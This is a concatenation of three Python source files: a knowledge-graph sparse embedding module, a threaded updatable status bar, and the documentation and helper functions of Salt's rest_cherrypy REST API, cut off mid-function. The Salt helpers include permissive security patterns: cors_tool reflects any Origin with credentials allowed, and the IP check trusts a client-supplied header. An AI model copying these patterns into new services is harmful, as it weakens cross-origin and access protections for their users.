    otherwise, OMP_NUM_THREADS=1 is mandatory.

    How to use:
    @thread_wrapped_func
    def func_to_wrap(args ...):
    """
    @wraps(func)
    def decorated_function(*args, **kwargs):
        channel = Queue()

        def _run_and_report():
            # Execute the wrapped callable and push (result, exception,
            # formatted traceback) back to the calling thread.
            try:
                outcome = (func(*args, **kwargs), None, None)
            except Exception as exc:
                outcome = (None, exc, traceback.format_exc())
            channel.put(outcome)

        start_new_thread(_run_and_report, ())
        value, err, tb = channel.get()

        if err is None:
            return value

        # Re-raise the same exception type, carrying the worker traceback
        # text as its message.
        assert isinstance(err, Exception)
        raise err.__class__(tb)

    return decorated_function
@thread_wrapped_func
def async_update(args, emb, queue):
    """Asynchronous embedding update for entity embeddings.
    How it works:
        1. trainer process push entity embedding update requests into the queue.
        2. async_update process pull requests from the queue, calculate
           the gradient state and gradient and write it into entity embeddings.

    Parameters
    ----------
    args :
        Global configs.
    emb : ExternalEmbedding
        The entity embeddings.
    queue:
        The request queue.
    """
    th.set_num_threads(args.num_thread)
    while True:
        (grad_indices, grad_values, gpu_id) = queue.get()
        clr = emb.args.lr
        if grad_indices is None:
            # Sentinel: trainer signals shutdown
            return
        with th.no_grad():
            # Adagrad-style state: accumulate mean of squared gradients per row
            grad_sum = (grad_values * grad_values).mean(1)
            device = emb.state_sum.device
            if device != grad_indices.device:
                grad_indices = grad_indices.to(device)
            if device != grad_sum.device:
                grad_sum = grad_sum.to(device)
            emb.state_sum.index_add_(0, grad_indices, grad_sum)
            std = emb.state_sum[grad_indices]  # _sparse_mask
            if gpu_id >= 0:
                std = std.cuda(gpu_id)
            # Scale the update by 1/sqrt(state) (epsilon added for stability)
            std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
            tmp = (-clr * grad_values / std_values)
            if tmp.device != device:
                tmp = tmp.to(device)
            # Apply the sparse update in place on the selected rows
            emb.emb.index_add_(0, grad_indices, tmp)
class ExternalEmbedding:
"""Sparse Embedding for Knowledge Graph
It is used to store both entity embeddings and relation embeddings.
Parameters
----------
args :
Global configs.
num : int
Number of embeddings.
dim : int
Embedding dimention size.
device : th.device
Device to store the embedding.
"""
def __init__(self, args, num, dim, device):
    self.gpu = args.gpu  # configured gpu id list (from global config)
    self.args = args
    self.num = num  # number of embeddings (rows)
    self.trace = []  # (idx, sliced-tensor) pairs recorded during forward for update()
    # Embedding table itself; left uninitialized until init() is called
    self.emb = th.empty(num, dim, dtype=th.float32, device=device)
    # Per-row accumulated squared-gradient state (optimizer state), zeroed
    self.state_sum = self.emb.new().resize_(self.emb.size(0)).zero_()
    self.state_step = 0
    self.has_cross_rel = False
    # queue used by asynchronous update
    self.async_q = None
    # asynchronous update process
    self.async_p = None
def init(self, emb_init):
"""Initializing the embeddings.
Parameters
----------
emb_init : float
The intial embedding range should be [-emb_init, emb_init].
"""
INIT.uniform_(self.emb, -emb_init, emb_init)
INIT.zeros_(self.state_sum)
def setup_cross_rels(self, cross_rels, global_emb):
cpu_bitmap = th.zeros((self.num,), dtype=th.bool)
for i, rel in enumerate(cross_rels):
cpu_bitmap[rel] = 1
self.cpu_bitmap = cpu_bitmap
self.has_cross_rel = True
self.global_emb = global_emb
def get_noncross_idx(self, idx):
cpu_mask = self.cpu_bitmap[idx]
gpu_mask = ~cpu_mask
return idx[gpu_mask]
def share_memory(self):
    """Use torch.tensor.share_memory_() to allow cross process tensor access
    """
    # Both the embedding table and its optimizer state are moved to shared
    # memory so trainer and async-update processes see the same storage
    self.emb.share_memory_()
    self.state_sum.share_memory_()
def __call__(self, idx, gpu_id=-1, trace=True):
""" Return sliced tensor.
Parameters
----------
idx : th.tensor
Slicing index
gpu_id : int
Which gpu to put sliced data in.
trace : bool
If True, trace the computation. This is required in training.
If False, do not trace the computation.
Default: True
"""
if self.has_cross_rel:
cpu_idx = idx.cpu()
cpu_mask = self.cpu_bitmap[cpu_idx]
cpu_idx = cpu_idx[cpu_mask]
cpu_idx = th.unique(cpu_idx)
if cpu_idx.shape[0] != 0:
cpu_emb = self.global_emb.emb[cpu_idx]
self.emb[cpu_idx] = cpu_emb.cuda(gpu_id)
s = self.emb[idx]
if gpu_id >= 0:
s = s.cuda(gpu_id)
# During the training, we need to trace the computation.
# In this case, we need to record the computation path and compute the gradients.
if trace:
data = s.clone().detach().requires_grad_(True)
self.trace.append((idx, data))
else:
data = s
return data
def update(self, gpu_id=-1):
    """ Update embeddings in a sparse manner
    Sparse embeddings are updated in mini batches. We maintain gradient states for
    each embedding so they can be updated separately.
    Parameters
    ----------
    gpu_id : int
        Which gpu to accelerate the calculation. if -1 is provided, cpu is used.
    """
    self.state_step += 1
    with th.no_grad():
        for idx, data in self.trace:
            # Gradient captured on the detached slice created in __call__.
            grad = data.grad.data
            clr = self.args.lr
            #clr = self.args.lr / (1 + (self.state_step - 1) * group['lr_decay'])
            # the update is non-linear so indices must be unique
            grad_indices = idx
            grad_values = grad
            if self.async_q is not None:
                # Hand the gradients off to the async updater process;
                # tensors must be in shared memory to cross process boundaries.
                grad_indices.share_memory_()
                grad_values.share_memory_()
                self.async_q.put((grad_indices, grad_values, gpu_id))
            else:
                # AdaGrad-style state: mean of squared gradients per row.
                grad_sum = (grad_values * grad_values).mean(1)
                device = self.state_sum.device
                if device != grad_indices.device:
                    grad_indices = grad_indices.to(device)
                if device != grad_sum.device:
                    grad_sum = grad_sum.to(device)
                if self.has_cross_rel:
                    # Rows flagged as cross-partition additionally propagate
                    # their update to the global CPU embedding.
                    cpu_mask = self.cpu_bitmap[grad_indices]
                    cpu_idx = grad_indices[cpu_mask]
                    if cpu_idx.shape[0] > 0:
                        cpu_grad = grad_values[cpu_mask]
                        cpu_sum = grad_sum[cpu_mask].cpu()
                        cpu_idx = cpu_idx.cpu()
                        self.global_emb.state_sum.index_add_(0, cpu_idx, cpu_sum)
                        std = self.global_emb.state_sum[cpu_idx]
                        if gpu_id >= 0:
                            std = std.cuda(gpu_id)
                        # Per-row adaptive step: clr / (sqrt(state) + eps).
                        std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
                        tmp = (-clr * cpu_grad / std_values)
                        tmp = tmp.cpu()
                        self.global_emb.emb.index_add_(0, cpu_idx, tmp)
                self.state_sum.index_add_(0, grad_indices, grad_sum)
                std = self.state_sum[grad_indices]  # _sparse_mask
                if gpu_id >= 0:
                    std = std.cuda(gpu_id)
                std_values = std.sqrt_().add_(1e-10).unsqueeze(1)
                tmp = (-clr * grad_values / std_values)
                if tmp.device != device:
                    tmp = tmp.to(device)
                # TODO(zhengda) the overhead is here.
                self.emb.index_add_(0, grad_indices, tmp)
    # All recorded gradients have been applied (or queued); start fresh.
    self.trace = []
def create_async_update(self):
    """Set up the async update subprocess.
    """
    # Queue of capacity 1 so the trainer blocks rather than racing far
    # ahead of the updater process.
    self.async_q = Queue(1)
    self.async_p = mp.Process(target=async_update, args=(self.args, self, self.async_q))
    self.async_p.start()
def finish_async_update(self):
    """Notify the async update subprocess to quit.
    """
    # A tuple of Nones is the shutdown sentinel understood by async_update;
    # then wait for the process to exit.
    self.async_q.put((None, None, None))
    self.async_p.join()
def curr_emb(self):
    """Concatenate and return every embedding slice currently recorded
    in the trace (row-wise, in recording order)."""
    traced = [emb for _, emb in self.trace]
    return th.cat(traced, 0)
def save(self, path, name):
    """Persist the embedding tensor to ``<path>/<name>.npy``.

    Parameters
    ----------
    path : str
        Directory to save the embedding.
    name : str
        Embedding name (file stem; ``.npy`` is appended).
    """
    target = os.path.join(path, name + '.npy')
    np.save(target, self.emb.cpu().detach().numpy())
def load(self, path, name):
    """Load an embedding previously stored by :meth:`save`.

    Parameters
    ----------
    path : str
        Directory to load the embedding from.
    name : str
        Embedding name (file stem; ``.npy`` is appended).
    """
    source = os.path.join(path, name + '.npy')
    self.emb = th.Tensor(np.load(source))
|
updatable_bar.py | from bento import bars
import threading
import time
class UpdatableBar(bars.BasicBar):
    """A bar that refreshes itself periodically from a background thread.

    Subclasses must override :meth:`do_update` with the actual refresh
    logic.  The update loop is controlled with :meth:`start_update`,
    :meth:`pause_update` and :meth:`stop_update`.
    """

    def __init__(self, *args, update_interval: float = 1, **kwargs):
        """
        Parameters
        ----------
        update_interval:
            Seconds to sleep between consecutive :meth:`do_update` calls.
        """
        super().__init__(*args, **kwargs)
        self.update_thread = None
        self.update_interval = update_interval
        # Set while updates should run; cleared to pause the loop.
        self.running = threading.Event()
        self.running.set()
        # Set once to terminate the loop permanently.
        self.kill = threading.Event()
        self.kill.clear()

    def create(self):
        # NOTE(review): the meaning of the 0.001 argument depends on
        # bars.BasicBar.create -- confirm against the bento library.
        super().create(0.001)

    def do_update(self):
        """Refresh the bar contents.  Must be implemented by subclasses."""
        raise NotImplementedError("Please subclass this and implement it!")

    def mainloop(self):
        """Run do_update() every ``update_interval`` seconds until killed."""
        while not self.kill.is_set():
            # While paused, poll once a second so a kill is still honored.
            while not self.is_running():
                self.running.wait(timeout=1)
                if self.kill.is_set():
                    return
            self.do_update()
            time.sleep(self.update_interval)

    def is_running(self):
        """Return True if updates are currently enabled (not paused)."""
        return self.running.is_set()

    def start_update(self):
        """Enable updates, spawning the worker thread if necessary."""
        self.running.set()
        if self.update_thread is None or not self.update_thread.is_alive():
            self.update_thread = threading.Thread(
                target=self.mainloop, args=())
            self.update_thread.start()

    def pause_update(self, delay=1):
        """Pause the update loop.  ``delay`` is kept for backward
        compatibility but is currently unused."""
        self.running.clear()

    def stop_update(self):
        """Permanently stop the update loop and wait for the thread to exit."""
        self.kill.set()
        self.wait_for_exit()

    def wait_for_exit(self):
        """Block until the update thread terminates.

        Fixed: previously raised AttributeError when called (e.g. via
        stop_update) before start_update ever created the thread.
        """
        if self.update_thread is not None:
            self.update_thread.join()
|
app.py | """
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log_access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log_error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=auto
# Read the cookie file:
curl -sSk https://localhost:8000 \\
-b ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
Another example using the :program:`requests` library in Python:
.. code-block:: python
>>> import requests
>>> session = requests.Session()
>>> session.post('http://localhost:8000/login', json={
'username': 'saltdev',
'password': 'saltdev',
'eauth': 'auto',
})
<Response [200]>
>>> resp = session.post('http://localhost:8000', json=[{
'client': 'local',
'tgt': '*',
'fun': 'test.arg',
'arg': ['foo', 'bar'],
'kwarg': {'baz': 'Baz!'},
}])
>>> resp.json()
{u'return': [{
...snip...
}]}
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
This interface directly exposes Salt's :ref:`Python API <python-api>`.
Everything possible at the CLI is possible through the Python API. Commands are
executed on the Salt Master.
The root URL (``/``) is RPC-like in that it accepts instructions in the request
body for what Salt functions to execute, and the response contains the result
of those function calls.
For example:
.. code-block:: text
% curl -sSi https://localhost:8000 \
-H 'Content-type: application/json' \
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping"
}]'
HTTP/1.1 200 OK
Content-Type: application/json
[...snip...]
{"return": [{"jerry": true}]}
The request body must be an array of commands. Use this workflow to build a
command:
1. Choose a client interface.
2. Choose a function.
3. Fill out the remaining parameters needed for the chosen client.
The ``client`` field is a reference to the main Python classes used in Salt's
Python API. Read the full :ref:`Client APIs <client-apis>` documentation, but
in short:
* "local" uses :py:class:`LocalClient <salt.client.LocalClient>` which sends
commands to Minions. Equivalent to the ``salt`` CLI command.
* "runner" uses :py:class:`RunnerClient <salt.runner.RunnerClient>` which
invokes runner modules on the Master. Equivalent to the ``salt-run`` CLI
command.
* "wheel" uses :py:class:`WheelClient <salt.wheel.WheelClient>` which invokes
wheel modules on the Master. Wheel modules do not have a direct CLI
equivalent but they typically manage Master-side resources such as state
files, pillar files, the Salt config files, and the :py:mod:`key wheel module
<salt.wheel.key>` exposes similar functionality as the ``salt-key`` CLI
command.
Most clients have variants like synchronous or asynchronous execution as well as
others like batch execution. See the :ref:`full list of client interfaces
<client-interfaces>`.
Each client requires different arguments and sometimes has different syntax.
For example, ``LocalClient`` requires the ``tgt`` argument because it forwards
the command to Minions and the other client interfaces do not. ``LocalClient``
also takes ``arg`` (array) and ``kwarg`` (dictionary) arguments because these
values are sent to the Minions and used to execute the requested function
there. ``RunnerClient`` and ``WheelClient`` are executed directly on the Master
and thus do not need or accept those arguments.
Read the method signatures in the client documentation linked above, but
hopefully an example will help illustrate the concept. This example causes Salt
to execute two functions -- the :py:func:`test.arg execution function
<salt.modules.test.arg>` using ``LocalClient`` and the :py:func:`test.arg
runner function <salt.runners.test.arg>` using ``RunnerClient``; note the
different structure for each command. The results for both are combined and
returned as one response.
.. code-block:: text
% curl -b ~/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.arg",
"arg": ["positional arg one", "positional arg two"],
"kwarg": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion"
}
},
{
"client": "runner",
"fun": "test.arg",
"keyword arg one": "Hello from a master",
"keyword arg two": "Runners do not support positional args"
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"args": [
"positional arg one",
"positional arg two"
],
"kwargs": {
"keyword arg one": "Hello from a minion",
"keyword arg two": "Hello again from a minion",
[...snip...]
}
},
[...snip; other minion returns here...]
},
{
"args": [],
"kwargs": {
"keyword arg two": "Runners do not support positional args",
"keyword arg one": "Hello from a master"
}
}
]
}
One more example, this time with more commonly used functions:
.. code-block:: text
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "state.sls",
"kwarg": {
"mods": "apache",
"pillar": {
"lookup": {
"wwwdir": "/srv/httpd/htdocs"
}
}
}
},
{
"client": "runner",
"fun": "cloud.create",
"provider": "my-ec2-provider",
"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy": true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
# cpstats moved/broke across CherryPy releases; probe for it and fall back
# to disabling the /stats endpoint when it is unavailable.
try:
    from cherrypy.lib import (  # pylint: disable=import-error,3rd-party-module-not-gated
        cpstats,
    )
except AttributeError:
    cpstats = None
    # Logger.warn is a deprecated alias for Logger.warning; use the
    # canonical name.
    logger.warning(
        "Import of cherrypy.cpstats failed. Possible upstream bug: "
        "https://github.com/cherrypy/cherrypy/issues/1444"
    )
except ImportError:
    cpstats = None
    logger.warning("Import of cherrypy.cpstats failed.")

try:
    # Imports related to websocket
    from .tools import websockets
    from . import event_processor

    HAS_WEBSOCKETS = True
except ImportError:
    # Stub type so attribute access degrades gracefully when ws4py is absent.
    websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})

    HAS_WEBSOCKETS = False
def html_override_tool():
    """
    Bypass the normal handler and serve HTML for all URLs

    The ``app_path`` setting must be non-empty and the request must ask for
    ``text/html`` in the ``Accept`` header.
    """
    apiopts = cherrypy.config["apiopts"]
    req = cherrypy.request

    # Never hijack requests for the app itself or for static assets.
    skip_prefixes = (
        apiopts.get("app_path", "/app"),
        apiopts.get("static_path", "/static"),
    )

    if "app" not in apiopts:
        return
    if req.path_info.startswith(skip_prefixes):
        return
    # A wildcard Accept header is not an explicit request for HTML.
    if req.headers.get("Accept") == "*/*":
        return

    try:
        preferred = cherrypy.lib.cptools.accept("text/html")
    except cherrypy.HTTPError:
        return
    if preferred != "text/html":
        return

    raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
    """
    If the custom authentication header is supplied, put it in the cookie dict
    so the rest of the session-based auth works as intended
    """
    token = cherrypy.request.headers.get("X-Auth-Token", None)

    # The explicit header takes precedence over any session cookie.
    if token:
        cherrypy.request.cookie["session_id"] = token
def salt_api_acl_tool(username, request):
    """
    .. versionadded:: 2016.3.0

    Verifies user requests against the API whitelist. (User/IP pair)
    in order to provide whitelisting for the API similar to the
    master, but over the API.

    .. code-block:: yaml

        rest_cherrypy:
            api_acl:
                users:
                    '*':
                        - 1.1.1.1
                        - 1.1.1.2
                    foo:
                        - 8.8.4.4
                    bar:
                        - '*'

    :param username: Username to check against the API.
    :type username: str
    :param request: Cherrypy request to check against the API.
    :type request: cherrypy.request
    """
    failure_str = "[api_acl] Authentication failed for " "user %s from IP %s"
    success_str = "[api_acl] Authentication successful for user %s from IP %s"
    pass_str = "[api_acl] Authentication not checked for " "user %s from IP %s"

    # Dig the optional api_acl section out of the master's rest_cherrypy config.
    acl = None
    salt_config = cherrypy.config.get("saltopts", None)
    if salt_config:
        cherrypy_conf = salt_config.get("rest_cherrypy", None)
        if cherrypy_conf:
            acl = cherrypy_conf.get("api_acl", None)

    ip = request.remote.ip

    # No ACL configured at all: let the request through unchecked.
    if not acl:
        logger.info(pass_str, username, ip)
        return True

    users = acl.get("users", {})
    if not users:
        logger.info(failure_str, username, ip)
        return False

    # Exact-user entries win over the wildcard user entry.
    if username in users:
        allowed = ip in users[username] or "*" in users[username]
    elif "*" in users:
        allowed = ip in users["*"] or "*" in users["*"]
    else:
        allowed = False

    logger.info(success_str if allowed else failure_str, username, ip)
    return allowed
def salt_ip_verify_tool():
    """
    If there is a list of restricted IPs, verify current
    client is coming from one of those IPs.
    """
    # Walk the optional config chain with guard clauses; any missing link
    # means no IP restriction is configured and the request passes through.
    salt_config = cherrypy.config.get("saltopts", None)
    if not salt_config:
        return
    cherrypy_conf = salt_config.get("rest_cherrypy", None)
    if not cherrypy_conf:
        return
    auth_ip_list = cherrypy_conf.get("authorized_ips", None)
    if not auth_ip_list:
        return

    logger.debug("Found IP list: %s", auth_ip_list)
    rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
    logger.debug("Request from IP: %s", rem_ip)
    if rem_ip not in auth_ip_list:
        logger.error("Blocked IP: %s", rem_ip)
        raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
    """
    Redirect all unauthenticated requests to the login page
    """
    # Redirect to the login page if the session hasn't been authed
    # (in practice a plain 401 is raised rather than an HTTP redirect).
    if "token" not in cherrypy.session:  # pylint: disable=W8601
        raise cherrypy.HTTPError(401)

    # Session is authenticated; inform caches
    cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
    """
    Handle both simple and complex CORS requests

    Add CORS headers to each response. If the request is a CORS preflight
    request swap out the default handler with a simple, single-purpose handler
    that verifies the request and provides a valid CORS response.
    """
    req_head = cherrypy.request.headers
    resp_head = cherrypy.response.headers

    # Always set response headers necessary for 'simple' CORS.
    resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
    # NOTE(review): Access-Control-Expose-Headers is supposed to list
    # response *header names*, yet HTTP methods are set here.  Preserved
    # verbatim to avoid a behavior change -- confirm intent upstream.
    resp_head["Access-Control-Expose-Headers"] = "GET, POST"
    resp_head["Access-Control-Allow-Credentials"] = "true"

    # Non-simple CORS preflight request; short-circuit the normal handler.
    if cherrypy.request.method == "OPTIONS":
        ac_method = req_head.get("Access-Control-Request-Method", None)

        allowed_methods = ["GET", "POST"]
        allowed_headers = [
            "Content-Type",
            "X-Auth-Token",
            "X-Requested-With",
        ]

        if ac_method and ac_method in allowed_methods:
            resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
            resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)

            resp_head["Connection"] = "keep-alive"
